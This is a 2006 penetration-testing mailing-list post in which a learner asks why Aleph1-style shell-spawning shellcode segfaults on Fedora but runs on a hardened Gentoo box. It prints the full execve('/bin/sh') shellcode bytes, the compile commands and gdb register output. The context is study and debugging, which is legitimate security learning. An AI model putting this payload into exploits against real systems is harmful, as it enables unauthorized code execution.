Penetration Testing mailing list archives
Shellcode itself segfaults
From: Paul Sebastian Ziegler <psz () observed de>
Date: Mon, 19 Jun 2006 21:06:45 +0200
Hi, I recently ran into a problem while exploring overflowing mechanisms. The overflowing itself is working just fine. But now I am at the point where I want to actually inject code into my test applications so I started searching for shellcodes to play with. Now when I use codes for playing around (e.g. opening the cd-drive) everything works just fine. However as soon as anything actually invokes a shell thus becoming a real "shellcode" the shellcode itself segfaults. As an example I have used this code contained in the paper "Buffer Overflows Complete" from http://hackaholic.org : ------------------------------------------------------------------------------- char main[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; ------------------------------------------------------------------------------- It is the same code that is also used in Aleph1's famous Phrack-Article 49-14. Next I compile it successfully: ------------------------------------------------------------------------------- $ gcc -o sh sh.c ------------------------------------------------------------------------------- No errors here. However when trying to run ./sh I get this: ------------------------------------------------------------------------------- $ ./sh Speicherzugriffsfehler (Segmentation fault) ------------------------------------------------------------------------------- I thought of trying to find out what happens here so I fired up gdb to check out: ------------------------------------------------------------------------------- $ gdb -q sh (no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) run Starting program: /home/tatsumori/exp/sh (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x00949e20 in __libc_start_main () from /lib/tls/libc.so.6 (gdb) backtrace #0 0x00949e20 in __libc_start_main () from /lib/tls/libc.so.6 #1 0x080482ad in _start () (gdb) info reg eax 0xa5e17c 10871164 ecx 0xbff2163c -1074653636 edx 0x1 1 ebx 0xa5bff4 10862580 esp 0xbff215b0 0xbff215b0 ebp 0xbff21608 0xbff21608 esi 0xbff21634 -1074653644 edi 0xbff215c0 -1074653760 eip 0x949e20 0x949e20 eflags 0x10246 66118 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) --------------------------------------------------------------------------------- Ok, so libc seems to be canceling my code here. This was tested on a Fedora Core 3 machine Linux version 2.6.11-1.14_FC3 (bhcompile () bugs build redhat com) (gcc version 3.4.3 20050227 (Red Hat 3.4.3-22)) #1 Thu Apr 7 19:23:49 EDT 2005 I also tested it on my gentoo-box with ssp and pie. Here it is impossible to actually smash the stack, however the shellcode itself works. --------------------------------------------------------------------------------- % gcc -o sh sh.c % ./sh sh-3.1$ exit --------------------------------------------------------------------------------- Linux version 2.6.16-hardened-r6r4h (root@localhost) (gcc バージョン 3.4.6 (Gentoo 3.4.6-r1, ssp-3.4.5-1.0, pie-8.7.9)) #10 PREEMPT Wed Jun 14 23:09:30 CEST 2006 However this is only true as long as I don't use setuid-code. Once I do this I get exactly the same segfault on this box too. I got the feeling that this is some kine of (maybe to) well know standard problem so I tried google. However the only keywords I could come up with (e.g. "shellcode setuid segfault") are conained in every single overflowing paper so I got 100,000+ results with the first 300 being tutorials that didn't contain anything useful for me. I would greatly appreciate it if someone could tell me what is going on here. Or maybe give me the name/URL of some paper handling this or giving me the right keyword to search for myself. Thanks a lot in advance! MfG Paul ------------------------------------------------------------------------------ This List Sponsored by: Cenzic Concerned about Web Application Security? Why not go with the #1 solution - Cenzic, the only one to win the Analyst's Choice Award from eWeek. As attacks through web applications continue to rise, you need to proactively protect your applications from hackers. Cenzic has the most comprehensive solutions to meet your application security penetration testing and vulnerability management needs. You have an option to go with a managed service (Cenzic ClickToSecure) or an enterprise software (Cenzic Hailstorm). Download FREE whitepaper on how a managed service can help you: http://www.cenzic.com/news_events/wpappsec.php And, now for a limited time we can do a FREE audit for you to confirm your results from other product. Contact us at request () cenzic com for details. ------------------------------------------------------------------------------
Current thread:
- Shellcode itself segfaults Paul Sebastian Ziegler (Jun 19)
- Re: Shellcode itself segfaults Justin Ferguson (Jun 19)
- Re: Shellcode itself segfaults Peter Kosinar (Jun 20)
- Re: Shellcode itself segfaults Ronald van der Westen (Jun 20)
- Re: Shellcode itself segfaults Justin Ferguson (Jun 20)
- Re: Shellcode itself segfaults Paul Sebastian Ziegler (Jun 21)
- Re: Shellcode itself segfaults Peter Kosinar (Jun 20)
- Re: Shellcode itself segfaults Justin Ferguson (Jun 19)